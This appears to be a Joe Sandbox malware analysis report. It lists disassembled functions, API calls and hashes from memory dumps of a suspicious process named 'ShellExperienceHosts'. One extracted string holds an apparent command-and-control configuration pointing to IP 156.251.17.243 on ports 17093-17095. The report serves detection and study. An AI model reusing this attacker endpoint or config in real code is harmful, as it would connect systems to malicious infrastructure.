Part of subcall function 032DF964: ExitThread.KERNEL32 ref: 032DF97C

__XcptFilter.LIBCMT ref: 032DF9B0

Part of subcall function 032E418F: __getptd_noexit.LIBCMT ref: 032E4195

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 418257734-0
Opcode ID: e61061287c58e9873e6ad20dd79900b922e703681401a443c9ce9e4b326090ef
Instruction ID: edff3ea1a40ef1847fbb14f5549a7133d5a6fd15c40990211e65c330eed5d3d7
Opcode Fuzzy Hash: e61061287c58e9873e6ad20dd79900b922e703681401a443c9ce9e4b326090ef
Instruction Fuzzy Hash: EFE0ECB9920740FFDB18FBA1D906E7D7775EF44A02F600148E1026F2A1CBB9A980DA20

Function 10007175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10007181

Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F

Part of subcall function 10007156: __getptd_noexit.LIBCMT ref: 1000715B
Part of subcall function 10007156: __freeptd.LIBCMT ref: 10007165
Part of subcall function 10007156: ExitThread.KERNEL32 ref: 1000716E

__XcptFilter.LIBCMT ref: 100071A2

Part of subcall function 10009C41: __getptd_noexit.LIBCMT ref: 10009C47

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 418257734-0
Opcode ID: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
Instruction ID: 91050fa4c4edb40f5b5d990f834f761f3b027d6385ed46559f27b3ea4901cb17
Opcode Fuzzy Hash: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
Instruction Fuzzy Hash: 76E0ECB9904604DFF718DBA0C956E6E7775EF44241F210049F1015B2A6CB35B940DB24

Function 032E6403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 032E641B

Part of subcall function 032E8E5B: __mtinitlocknum.LIBCMT ref: 032E8E71
Part of subcall function 032E8E5B: __amsg_exit.LIBCMT ref: 032E8E7D
Part of subcall function 032E8E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,032E3F06,0000000D,032F6340,00000008,032E3FFF,00000000,?,032E10F0,00000000,032F6278,00000008,032E1155,?), ref: 032E8E85

__tzset_nolock.LIBCMT ref: 032E642C

Part of subcall function 032E5D22: __lock.LIBCMT ref: 032E5D44
Part of subcall function 032E5D22: ____lc_codepage_func.LIBCMT ref: 032E5D8B
Part of subcall function 032E5D22: __getenv_helper_nolock.LIBCMT ref: 032E5DAD
Part of subcall function 032E5D22: _free.LIBCMT ref: 032E5DE4
Part of subcall function 032E5D22: _strlen.LIBCMT ref: 032E5DEB
Part of subcall function 032E5D22: __malloc_crt.LIBCMT ref: 032E5DF2
Part of subcall function 032E5D22: _strlen.LIBCMT ref: 032E5E08
Part of subcall function 032E5D22: _strcpy_s.LIBCMT ref: 032E5E16
Part of subcall function 032E5D22: __invoke_watson.LIBCMT ref: 032E5E2B
Part of subcall function 032E5D22: _free.LIBCMT ref: 032E5E3A

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
String ID:
API String ID: 1828324828-0
Opcode ID: 474da72ad78dc2cc8cb7f11addad6d8adc329fd6e221f4ec718ac5f625c6267e
Instruction ID: 4fe200172aa327d4af17182fabd9c4905666bde40cc422abc052d6a56e12e41a
Opcode Fuzzy Hash: 474da72ad78dc2cc8cb7f11addad6d8adc329fd6e221f4ec718ac5f625c6267e
Instruction Fuzzy Hash: 87E0123A8A1715DAC636FBE1B54370CB265EBA4F25FE4425AE19419484CEB002C1C652

Function 1000474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(|p1:156.251.17.243|o1:17093|t1:1|p2:156.251.17.243|o2:17094|t2:1|p3:156.251.17.243|o3:17095|t3:1|dd:1|cl:1|fz:), ref: 10004755

Part of subcall function 10003260: __wcsrev.LIBCMT ref: 10020655

Strings

|p1:156.251.17.243|o1:17093|t1:1|p2:156.251.17.243|o2:17094|t2:1|p3:156.251.17.243|o3:17095|t3:1|dd:1|cl:1|fz:, xrefs: 10004750

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: __wcsrevlstrlen
String ID: |p1:156.251.17.243|o1:17093|t1:1|p2:156.251.17.243|o2:17094|t2:1|p3:156.251.17.243|o3:17095|t3:1|dd:1|cl:1|fz:
API String ID: 4062721203-1085766062
Opcode ID: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
Instruction ID: 3065bb4344b1789bcecd08ba6036c617636919b35652953f12b0e4d8e139a27a
Opcode Fuzzy Hash: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
Instruction Fuzzy Hash: EFC08C72208214CFF202E3D4988876D7359EB33722F608039FA00CD012E672CC8097B1

Function 032D6EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80000001,032D6E9A), ref: 032D6EC9
RegCloseKey.ADVAPI32(75BF73E0), ref: 032D6ED2

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: b428e976d529567b8707f5bfd1ac7b9e4d1caae64b2a570541d3765e87ca08b0
Instruction ID: 36e265e1fdbd3b7f567e78d7f004b14eb1eaaa9994c2e741e2b463e93b5f98f9
Opcode Fuzzy Hash: b428e976d529567b8707f5bfd1ac7b9e4d1caae64b2a570541d3765e87ca08b0
Instruction Fuzzy Hash: 86C09B73D011389BCF10F7A4FD4894D77B89F4C110F1184D6A104A3114C634BD41CF90

Function 6CB13534 Relevance: 2.6, APIs: 2, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,6CB13523,6CB1EAA6,?,00000000,00000000), ref: 6CB1358A
GetLastError.KERNEL32(?,00000000,?,6CB13523,6CB1EAA6,?,00000000,00000000), ref: 6CB13594

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: b5f1d94cdf7f1b40384edee7e5ac8052548892240ff160d2111223f6b0a4101d
Instruction ID: 7f39de71e4c69adfc3f40da81d3e12a4ad181236568c465e737c73c327ab29f6
Opcode Fuzzy Hash: b5f1d94cdf7f1b40384edee7e5ac8052548892240ff160d2111223f6b0a4101d
Instruction Fuzzy Hash: 6E11253371D1D01AD6441A3AA9057BE3B69AB83F7CF38024DE8198BEC0FB70DD848252

Function 6C9B2420 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9B271F

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 137e3a1638d106a8cdb441c7771d5fe973c476b55bebdc7f00d7433506de9061
Instruction ID: ba323e7da4033a532aa783e09de11d20aac2cc48bd6d01a4374bd5fdbecd0804
Opcode Fuzzy Hash: 137e3a1638d106a8cdb441c7771d5fe973c476b55bebdc7f00d7433506de9061
Instruction Fuzzy Hash: 2C912B709006898FDB10CF68C998B9EBBB4FF14318F14C599D40AB7751DB75AA89CF90

Function 6CB0BA67 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 346cf070afc95260bbafccecf4c7e0ee20ec2cc310e4d41dcfd5e70c4a2af663
Instruction ID: 4ce2c8d352b90a342b25daf3bd3edf3155eca08e00897be2591db0528437f098
Opcode Fuzzy Hash: 346cf070afc95260bbafccecf4c7e0ee20ec2cc310e4d41dcfd5e70c4a2af663
Instruction Fuzzy Hash: 12519070B04184AFDF14CF58C881E9DBFB1EB8A328F288198E8595B751D771DA41CB91

Function 6C9DEB69 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9DEB70

Part of subcall function 6C9DF8C4: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 6C9DF921
Part of subcall function 6C9DF8C4: VerSetConditionMask.KERNEL32(00000000), ref: 6C9DF929
Part of subcall function 6C9DF8C4: VerifyVersionInfoW.KERNEL32(0000011C,00000003,00000000), ref: 6C9DF93A
Part of subcall function 6C9DF8C4: GetSystemMetrics.USER32(00001000), ref: 6C9DF94B

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: ConditionMask$H_prolog3InfoMetricsSystemVerifyVersion
String ID:
API String ID: 2710481357-0
Opcode ID: 50642bec0d714444475682e869ed124417a1d4d311eb92b37beebbd048819038
Instruction ID: 1359e8896e3742e65e371c7afe216fe7f1d9f7592acc3f89ba17fb734a23b642
Opcode Fuzzy Hash: 50642bec0d714444475682e869ed124417a1d4d311eb92b37beebbd048819038
Instruction Fuzzy Hash: 7A51EDB0906F418FD3A9CF3A85417D6FAE0BF89300F108A2E91AED7660EB716184CF51

Function 6C9AE7E0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C9AE8E9

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: dde3a6a38a3eda4cddfade9d577fd1400af3cc9777a044d2cbfdca8caa396e67
Instruction ID: 236b69b6868d0eb913a64273b3a0dbbafd0d42c32abf58247dee69059a220b20
Opcode Fuzzy Hash: dde3a6a38a3eda4cddfade9d577fd1400af3cc9777a044d2cbfdca8caa396e67
Instruction Fuzzy Hash: A6310671901258DBEB10CF98D985F99B7B8FB14318F1446A9D8099BA90E731AA49CF90

Function 6CB18FD6 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 6CB18F8D

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 99f47cd02dd8032b6c3c4ffe6b464829ae168ebd92f6022bacb10dd862633e40
Instruction ID: bc885795d472d77cb8ebff7fa880a5a114e98c9300a2dbd7c4abb3070dc614d1
Opcode Fuzzy Hash: 99f47cd02dd8032b6c3c4ffe6b464829ae168ebd92f6022bacb10dd862633e40
Instruction Fuzzy Hash: F8116A71A0824AAFCF05CF58E84099F7BF9EF49314F05406AF808EB701D631E911CBA5

Function 032EA6F2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,032E454A,00000000,00000001,00000000,00000000,00000000,?,032E3E0D,00000001,00000214,?,032E4500), ref: 032EA735

Part of subcall function 032DF91B: __getptd_noexit.LIBCMT ref: 032DF91B

Memory Dump Source

Source File: 00000003.00000002.3535448188.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: true

Associated: 00000003.00000002.3535448188.0000000003304000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32d0000_ShellExperienceHosts.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 9369d6c255d0663d00d7887c43d4d3d51f37bf2ce1fce196e6a84419d96dff6c
Instruction ID: c6029dee667292e9b312d8b469a9a4b69c626462394dec23e89143120c1e36e0
Opcode Fuzzy Hash: 9369d6c255d0663d00d7887c43d4d3d51f37bf2ce1fce196e6a84419d96dff6c
Instruction Fuzzy Hash: E20124392303169EEB28DF25DC56B6F33B8AB813A0F498529E806CB190D774C880DB90

Function 1000E555 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10009FFA,00000000,00000001,00000000,00000000,00000000,?,100098C1,00000001,00000214,?,10009FB0), ref: 1000E598

Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
Instruction ID: 103cc215c0c144a9a87f3cbc911116c8ac8a7c4356fc0ca5ef77af160fbe558d
Opcode Fuzzy Hash: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
Instruction Fuzzy Hash: E9012435205A958EFB18CF24CC54B5A37D4EB853E6F018929E815AA0D4EB70DC00CB80

Function 6C9D2379 Relevance: 1.5, APIs: 1, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C9D2380

Part of subcall function 6C9D2049: TlsAlloc.KERNEL32(?,6C9D23AC,00000004,6C9D0D08,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120,6C9A10EB,00000000,?,Function_00180400,000000FF), ref: 6C9D2068
Part of subcall function 6C9D2049: InitializeCriticalSection.KERNEL32(6CB8D910,?,6C9D23AC,00000004,6C9D0D08,6C9B9048,6C9C66EE,?,6C9CC267,00000004,6C9CCA19,00000120,6C9A10EB,00000000,?,Function_00180400), ref: 6C9D2079

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AllocCriticalH_prolog3InitializeSection
String ID:
API String ID: 2369468792-0
Opcode ID: 39d38ba8bdba1e374fe20bc275fef3d522a5f10c33c5dc0b1a24781fa283d54a
Instruction ID: 1fb0807f3a254ee4f21df72bf29dcd13a9eaabb7093bc2d72d27dc4b3cbb1f80
Opcode Fuzzy Hash: 39d38ba8bdba1e374fe20bc275fef3d522a5f10c33c5dc0b1a24781fa283d54a
Instruction Fuzzy Hash: DF019E30702E838BDB199F38D9086ADB774AF11669B128126A824EBB90DB30ED44DB40

Function 6CB0E632 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6CB0EB97,00000001,00000364,00000000,00000006,000000FF,?,?,6CB0CF76), ref: 6CB0E673

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7ee2ce5dd9b6d59937e6c9900150782fa255b0015aed41cee0162cff6f60aecd
Instruction ID: c283739f7713f33747c82194f35a5495888609474023eb5e86acd7693edac4e3
Opcode Fuzzy Hash: 7ee2ce5dd9b6d59937e6c9900150782fa255b0015aed41cee0162cff6f60aecd
Instruction Fuzzy Hash: E6F0B4327461E45AEB114A66B804F4F3F6CEF52774B218111ACD8ABD84CB20DC0086E2

Function 1000608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 100060A0

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
Instruction ID: d3b2713253b45803e0e36550a0a091f6b3b019736998aa0157c013c20421de29
Opcode Fuzzy Hash: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
Instruction Fuzzy Hash: B2E09274908216EADB25DB80C984BFE73B5FB64385F30814DE8042F094D375AE84AA91

Function 6CB1E56C Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000000,?,6CB1E95C,?,?,00000000,?,6CB1E95C,?,0000000C), ref: 6CB1E589

Memory Dump Source

Source File: 00000003.00000002.3536028295.000000006C9A1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C9A0000, based on PE: true

Associated: 00000003.00000002.3536008544.000000006C9A0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536144163.000000006CB30000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536185273.000000006CB86000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536205328.000000006CB88000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536226112.000000006CB8D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3536246088.000000006CB91000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c9a0000_ShellExperienceHosts.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: cc594d9c9cbec6111548752aa857d9c962da09f64c7d3ef2cf6f97410f33e2bf
Instruction ID: ecb8021f13cc4a854b2085a165d90302167583ac3190972dd58c42139bc32f79
Opcode Fuzzy Hash: cc594d9c9cbec6111548752aa857d9c962da09f64c7d3ef2cf6f97410f33e2bf
Instruction Fuzzy Hash: 14D06C3210014DBBDF128E84DC46EDA3BAAFB4C714F054000BA1856020C732E821AB90

Function 10005E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32 ref: 1001F0F9

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3535884612.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535927057.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535947113.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535967860.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3535987425.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_ShellExperienceHosts.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
Instruction ID: fe46c43de78f47d222b333b3703367a29387d0af8959c827854050506a177f75
Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
Instruction Fuzzy Hash: 26C08C30C4C75EE2D032E8101C0A1BDB3E4E778299F3005BFAC452D884E4F4A9C0B6EA

Function 100060DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 1001FAB1

Memory Dump Source

Source File: 00000003.00000002.3535904141.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

